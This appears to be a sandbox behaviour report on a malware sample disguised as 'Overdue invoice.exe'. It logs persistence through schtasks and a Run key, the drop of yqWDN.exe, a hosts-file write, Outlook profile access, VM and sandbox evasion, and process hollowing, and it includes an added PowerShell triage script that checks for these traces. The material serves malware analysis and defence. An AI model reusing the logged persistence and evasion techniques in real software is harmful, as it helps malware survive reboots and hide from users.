Source: Overdue invoice.exe, 00000007.00000002.521143332.00000000016E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Overdue invoice.exe
Source: Overdue invoice.exe, 00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBMTJANdgKFUuCnPQQfLHbkDsZIdwvTWhXel.exe4 vs Overdue invoice.exe
Source: Overdue invoice.exe, 00000007.00000003.316115485.0000000006A0A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
Source: Overdue invoice.exe, 00000007.00000002.520543885.00000000014F8000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Overdue invoice.exe
Source: Overdue invoice.exe | Binary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
Source: Overdue invoice.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dYXeRswtYBrq.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: yqWDN.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Overdue invoice.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: dYXeRswtYBrq.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: yqWDN.exe.7.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Overdue invoice.exe | Virustotal: Detection: 60%
Source: Overdue invoice.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\Overdue invoice.exe | File read: C:\Users\user\Desktop\Overdue invoice.exe
Source: Overdue invoice.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Overdue invoice.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\Overdue invoice.exe "C:\Users\user\Desktop\Overdue invoice.exe"
Source: C:\Users\user\Desktop\Overdue invoice.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmp
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Overdue invoice.exe | Process created: C:\Users\user\Desktop\Overdue invoice.exe {path}
Source: C:\Users\user\Desktop\Overdue invoice.exe | Process created: C:\Users\user\Desktop\Overdue invoice.exe {path}
Source: unknown | Process created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe "C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe "C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe"
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmp2055.tmp
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Process created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe {path}
Source: C:\Users\user\Desktop\Overdue invoice.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmp
Source: C:\Users\user\Desktop\Overdue invoice.exe | Process created: C:\Users\user\Desktop\Overdue invoice.exe {path}
Source: C:\Users\user\Desktop\Overdue invoice.exe | Process created: C:\Users\user\Desktop\Overdue invoice.exe {path}
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmp2055.tmp
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Process created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe {path}
Source: C:\Users\user\Desktop\Overdue invoice.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\Overdue invoice.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Overdue invoice.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Overdue invoice.exe | File created: C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exe
Source: C:\Users\user\Desktop\Overdue invoice.exe | File created: C:\Users\user\AppData\Local\Temp\tmpA306.tmp
Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@15/8@3/2
Source: C:\Users\user\Desktop\Overdue invoice.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: Overdue invoice.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Overdue invoice.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\Overdue invoice.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_01
Source: 7.0.Overdue invoice.exe.400000.10.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.0.Overdue invoice.exe.400000.10.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.0.Overdue invoice.exe.400000.6.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.0.Overdue invoice.exe.400000.6.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.0.Overdue invoice.exe.400000.12.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.0.Overdue invoice.exe.400000.12.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Users\user\Desktop\Overdue invoice.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Overdue invoice.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Overdue invoice.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\Overdue invoice.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Overdue invoice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Overdue invoice.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_027366AD push FFFFFF8Bh; iretd
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_07263D82 push esi; retf
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_016D5170 push es; ret
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_016D5150 push es; ret
Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064EAE5D push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE1E push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE1A push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE16 push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE2E push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE2A push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE26 push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE22 push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE3A push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE36 push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE32 push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAC41 push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EACBE push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAD56 push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EBA60 push es; ret
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAA09 push es; retf
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064E3139 push es; iretd
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C697CB push ss; ret
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C617E9 push es; ret
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C69783 push ss; ret
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C61789 push es; ret
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C6177F push es; ret
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C6977B push ss; ret
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C69778 push ss; ret
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C63330 push es; iretd
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C618CB push es; ret
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C618AF push es; ret
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.65168574947
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.65168574947
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.65168574947
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile created: C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exeJump to dropped file

                    Boot Survival

                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmp"
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run yqWDN (2 occurrences)

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Users\user\Desktop\Overdue invoice.exe | File opened: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Process information set: NOOPENFILEERRORBOX (87 occurrences)
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Process information set: NOOPENFILEERRORBOX (108 occurrences)
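The persistence entries under Boot Survival (an HKCU Run value named yqWDN and a scheduled task created under the Updates folder from an XML file in %TEMP%) and the Zone.Identifier deletion listed in this section can be checked on a live host. The PowerShell triage script below is an added example; it is not part of the Joe Sandbox report and not code from the sample. The task folder name "Updates", the Run value name and the Roaming AppData drop location come from the report; the AppData path pattern, the seven-day look-back window and the output layout are assumptions made for the example.

```powershell
# Added triage example: not part of the Joe Sandbox report or of the sample.
# Checks a live host for the three artifacts the report lists:
#   1. an HKCU Run value (the sample wrote "yqWDN") whose command runs from AppData
#   2. a scheduled task registered under "\Updates\" via schtasks /Create /XML
#   3. recently created EXEs in Roaming AppData with no Zone.Identifier stream
# Patterns, the look-back window and the output layout are assumptions.
# Run in the context of the affected user (HKCU and %APPDATA% are per-user).

$findings       = New-Object System.Collections.Generic.List[object]
$profilePattern = '(?i)\\AppData\\(Roaming|Local)\\'

# 1. Run key: list every value, flag those that execute from the user profile.
$runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$run = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
if ($run) {
    foreach ($prop in $run.PSObject.Properties) {
        if ($prop.Name -like 'PS*') { continue }   # provider metadata, not a Run value
        $cmd = [string]$prop.Value
        if ($cmd -match $profilePattern) {
            $findings.Add([pscustomobject]@{ Kind = 'RunKey'; Name = $prop.Name; Target = $cmd })
        }
    }
}

# 2. Scheduled tasks: Windows does not create a top-level "Updates" task folder itself,
#    and a task action that points into AppData is unusual for legitimate software.
Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        $exe = [string]$action.Execute
        if (-not $exe) { continue }                # COM-handler actions have no Execute
        if ($task.TaskPath -eq '\Updates\' -or $exe -match $profilePattern) {
            $findings.Add([pscustomobject]@{
                Kind   = 'ScheduledTask'
                Name   = $task.TaskPath + $task.TaskName
                Target = $exe
            })
        }
    }
}

# 3. Mark of the Web: the sample opened yqWDN.exe:Zone.Identifier with delete access.
#    Recently created EXEs under %APPDATA% that carry no Zone.Identifier stream are
#    listed; the stream is absent both when it was stripped and when the file was
#    written by a program rather than downloaded, so each hit still needs a look.
$since = (Get-Date).AddDays(-7)                    # assumed look-back window
Get-ChildItem -Path $env:APPDATA -Filter *.exe -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object { $_.CreationTime -gt $since } |
    ForEach-Object {
        $zone = Get-Item -LiteralPath $_.FullName -Stream Zone.Identifier -ErrorAction SilentlyContinue
        if (-not $zone) {
            $findings.Add([pscustomobject]@{ Kind = 'NoMotW'; Name = $_.Name; Target = $_.FullName })
        }
    }

$findings | Sort-Object Kind, Name | Format-Table -AutoSize
```

On an infected host this would list the yqWDN Run value, the \Updates\dYXeRswtYBrq task and the two dropped executables from the report; on a clean host the AppData pattern can still match legitimate per-user installers, so treat the output as a triage list rather than a verdict.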

                    Malware Analysis System Evasion

                    Source: Yara match | File source: Process Memory Space: Overdue invoice.exe PID: 6504, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: yqWDN.exe PID: 5496, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: yqWDN.exe PID: 7048, type: MEMORYSTR
                    Source: Overdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 0000000F.00000002.373514445.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: Overdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 0000000F.00000002.373514445.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Overdue invoice.exe TID: 6536 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\Overdue invoice.exe TID: 4264 | Thread sleep time: -13835058055282155s >= -30000s
                    Source: C:\Users\user\Desktop\Overdue invoice.exe TID: 6276 | Thread sleep count: 4378 > 30
                    Source: C:\Users\user\Desktop\Overdue invoice.exe TID: 6276 | Thread sleep count: 4299 > 30
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe TID: 7128 | Thread sleep time: -20291418481080494s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe TID: 7020 | Thread sleep count: 3465 > 30
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe TID: 7020 | Thread sleep count: 5329 > 30
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Window / User API: threadDelayed 4378
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Window / User API: threadDelayed 4299
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Window / User API: threadDelayed 3465
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Window / User API: threadDelayed 5329
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Thread delayed: delay time: 922337203685477
                    Source: yqWDN.exe, 0000000F.00000002.371657286.0000000000E62000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                    Source: Overdue invoice.exe, 00000007.00000002.521324973.0000000001715000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\Overdue invoice.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Overdue invoice.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Overdue invoice.exe | Memory written: C:\Users\user\Desktop\Overdue invoice.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Memory written: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Overdue invoice.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmp
Source: C:\Users\user\Desktop\Overdue invoice.exe | Process created: C:\Users\user\Desktop\Overdue invoice.exe {path}
Source: C:\Users\user\Desktop\Overdue invoice.exe | Process created: C:\Users\user\Desktop\Overdue invoice.exe {path}
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmp2055.tmp
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Process created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe {path}
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Users\user\Desktop\Overdue invoice.exe VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
